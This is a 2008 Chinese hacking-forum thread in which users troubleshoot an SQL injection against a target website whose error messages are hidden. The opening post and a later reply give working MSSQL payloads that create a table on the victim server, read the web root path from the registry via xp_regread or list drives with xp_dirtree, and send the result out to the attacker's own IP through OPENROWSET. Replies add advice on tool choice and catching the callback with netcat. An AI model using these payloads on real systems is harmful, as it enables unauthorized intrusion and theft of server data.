Board logo

标题: [讨论]SQL注入屏蔽错误提示找路径的一些问题 [打印本页]

作者: 2000gaobo    时间: 2008-7-20 18:04     标题: [讨论]SQL注入屏蔽错误提示找路径的一些问题

[讨论]SQL注入屏蔽错误提示找路径的一些问题
议题作者:圣堂骑士
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

一个注入。MSSQL的DB权限
本想列目录写一句话
结果拿给阿D跑,发现无法列目录,手工提交发现是屏蔽了错误显示
想用openrowset连接本机mssql得路径
然后在对方机器上建立个表
1.create table [dbo].[fenggou]([cha8][char](255))--
2.DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('SELECT a.* FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密码'', ''SELECT * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--
3.DECLARE @a1 char(255) set @a1=(SELECT cha8 FROM fenggou) exec (@a1);--

最后在本机没有读出路径。怀疑是注册表做了改动
所以问题来了,我想问下。能否运用同样的方法将xp_dirtree读出的数据。通过本地SQL跟踪器查看到
如果能的话。希望能写写语句。因为小弟太菜构造了半天也没构造出来
希望大牛们帮帮忙。


帖子13 精华0 积分48 阅读权限40 性别男 在线时间12 小时 注册时间2007-5-6 最后登录2008-3-30 查看个人网站
查看详细资料引用 报告 回复 TOP 少女暴富的隐秘(图)

gxm
荣誉会员

作者: 拖车文    时间: 2008-7-20 18:04

'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots',这个只能是win2000的有效,2003不存在这个问题。很大可能你入侵的机器是2003,如果你说工具列不出目录的话,那么就放弃吧,一般注入点是DB权限的话,没有屏蔽错误的话,有xp_dirtree的话,列目录应该很快,屏蔽错误的话,工具应该会用xp_dirtree过程得到的目录写进一个表,然后读出来,你所遇到的问题可能是其中的几个
第一:你的网速慢(可能性不大)
第二:没有xp_dirtree过程(可能性不大)
第三:啊D一般会暴错权限,你用下NBSI或者domain,很大可能的权限是PUBLIC权限(可能性很大)我一般都会这样
还有需要不确定因素,自己去排除吧
帖子43 精华0 积分3206 阅读权限100 性别男 在线时间29 小时 注册时间2007-1-13 最后登录2008-6-30 查看详细资料引用 报告 回复 TOP 赚更多的钱

烟,灭在雪里
荣誉会员

作者: 教授2    时间: 2008-7-20 18:04

不显错的时候 如果网速慢 反正啊D有时候就不能列 上次和朋友搞一个站 我感觉就没删除xp_dirtree 换了个网吧 速度刷刷的 第三点GXM分析的到是相当有可能 但是貌似如果是MS不显错模式 那么NB检查的权限也不怎么准 如果真的事PUBLIC 你可以尝试某大牛用全局临时表的方法来列下看看 估计木啥用 不看好 晕忽忽

帖子18 精华0 积分60 阅读权限100 在线时间30 小时 注册时间2007-9-15 最后登录2008-6-24 查看个人网站
查看详细资料引用 报告 回复 TOP 软件项目外包

圣堂骑士
晶莹剔透§烈日灼然
作者: 醉鞭名马    时间: 2008-7-20 18:04

先xx楼上两位下
我想问问 如果假设确定已是db,xp_dirtee没有删除
就是利用xp_dirtree 列c盘的内容,然后利用openrowset连接本机,就相当于fenggou这个表多了条这个语句SELECT * FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密码', 'SELECT * FROM pubs.dbo.authors where au_fname=''C盘的目录''')AS a
能否实现,因为小弟没按sql server无法测试,谢谢大大们帮看看
DECLARE @result varchar(255) exec master.dbo.xp_dirtree ,'c:\',@result output insert into fenggou (cha8) values('SELECT * FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密码'', ''SELECT * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--

帖子13 精华0 积分48 阅读权限40 性别男 在线时间12 小时 注册时间2007-5-6 最后登录2008-3-30 查看个人网站
查看详细资料引用 报告 回复 TOP

gxm
荣誉会员

作者: 44447777kun    时间: 2008-7-20 18:04

呵呵,这种方法一定要本地安装mssql才行,但是我不建议这么做。你如果确定真的是db权限,并且有xp_dirtree的话,那么请你先在注入点上先建立表,然后用xp_dirtree把目录插进你建议的表中,然后用工具把目录读出来。我以为碰到的一个站是2000服务器,也因为他的屏蔽错误提示,但是就是把用xp_regread过程读出'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots',里的东西插入表中。然后在用工具读出表的内容的。尝试下吧
帖子43 精华0 积分3206 阅读权限100 性别男 在线时间29 小时 注册时间2007-1-13 最后登录2008-6-30 查看详细资料引用 报告 回复 TOP 少女暴富的隐秘(图)

烟,灭在雪里
荣誉会员

作者: 巫山北    时间: 2008-7-20 18:04

反连IP并不见得非要装SQL嘛 你可以用NC监听 当有连接不就看见IP了吗 真是的 晕翻你

帖子18 精华0 积分60 阅读权限100 在线时间30 小时 注册时间2007-9-15 最后登录2008-6-24 查看个人网站
查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

圣堂骑士
晶莹剔透§烈日灼然
作者: H先生    时间: 2008-7-20 18:04

先谢谢gxm了。兄弟你可能理解错了。
不知道你玩过那个洞网7.10DAY没。只要语法没有出错就返回的正常。相当于。加and 1=1和and 1=2返回一样的。所以完全无法判断。更不可能甩给工具跑了。所以才想到用openrowset这一烂招。让他连接我。让他抱的错,直接爆我这来。我就是不知道。我上面的xp_dirtree c:\能不能玩

帖子13 精华0 积分48 阅读权限40 性别男 在线时间12 小时 注册时间2007-5-6 最后登录2008-3-30 查看个人网站
查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

圣堂骑士
晶莹剔透§烈日灼然
作者: 孙林    时间: 2008-7-20 18:04

gxm兄。能否能给个qq或者msn。想跟你交流交流

帖子13 精华0 积分48 阅读权限40 性别男 在线时间12 小时 注册时间2007-5-6 最后登录2008-3-30 查看个人网站
查看详细资料引用 报告 回复 TOP

56352351
晶莹剔透§烈日灼然
作者: 风云仔    时间: 2008-7-20 18:04

恩.........楼主不知道看过这2篇文章没,看看可能思路就清晰了
http://hi.baidu.com/lever/blog/item/4ec0d1588d15cc80800a188a.html
http://blog.csdn.net/ring04h/archive/2007/01/28/1496017.aspx
我觉得写的很好,呵呵~个人意见啊~
帖子13 精华0 积分48 阅读权限40 性别男 在线时间17 小时 注册时间2007-12-21 最后登录2008-5-3 查看详细资料引用 报告 回复 TOP

gxm
荣誉会员

作者: 1606    时间: 2008-7-20 18:04

我的QQ是:419891509
呵呵,如果是返回 and 1=1 和and 1=2都是一个页面?需要环境,如果可以的话联系我吧,杂们一起研究
帖子43 精华0 积分3206 阅读权限100 性别男 在线时间29 小时 注册时间2007-1-13 最后登录2008-6-30 查看详细资料引用 报告 回复 TOP

圣堂骑士
晶莹剔透§烈日灼然
作者: may    时间: 2008-7-20 18:04

我服YOU了。56352351。你太帅了
SQL INJECTION的终极利器opendatasource和openrowset这篇文章帮大忙了。
学习了。
太感谢了

帖子13 精华0 积分48 阅读权限40 性别男 在线时间12 小时 注册时间2007-5-6 最后登录2008-3-30 查看个人网站
查看详细资料引用 报告 回复 TOP

56352351
晶莹剔透§烈日灼然
作者: 小丫头    时间: 2008-7-20 18:04

呵呵~~过段时间看能不能写个工具出来~在努力中~~
帖子13 精华0 积分48 阅读权限40 性别男 在线时间17 小时 注册时间2007-12-21 最后登录2008-5-3 查看详细资料引用 报告 回复 TOP

fatcat
晶莹剔透§烈日灼然
作者: 拖车文    时间: 2008-7-20 18:04

openrowset这个04年小黑就出了工具了,现在很多机器越来越严了,难反连的。
而且SQL2005默认是禁止的!以后还是写进数据库慢慢猜解有前途晕啊晕
帖子45 精华0 积分145 阅读权限40 性别男 来自浙江 在线时间68 小时 注册时间2004-11-9 最后登录2008-7-2 查看详细资料引用 报告 回复 TOP

56352351
晶莹剔透§烈日灼然
作者: 胖嘟嘟    时间: 2008-7-20 18:04

出了工具了?我死都没找到啊,奇怪.
2005我看了些,不知道能不能用SQL命令吧默认设置改了,这个会暴露IP的确是很麻烦.但是在关闭回显的时候是效率很高,你那工具有吗?有的话能告诉我在哪下吗? 谢谢了
帖子13 精华0 积分48 阅读权限40 性别男 在线时间17 小时 注册时间2007-12-21 最后登录2008-5-3 查看详细资料引用 报告 回复 TOP

kosi
晶莹剔透§烈日灼然




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2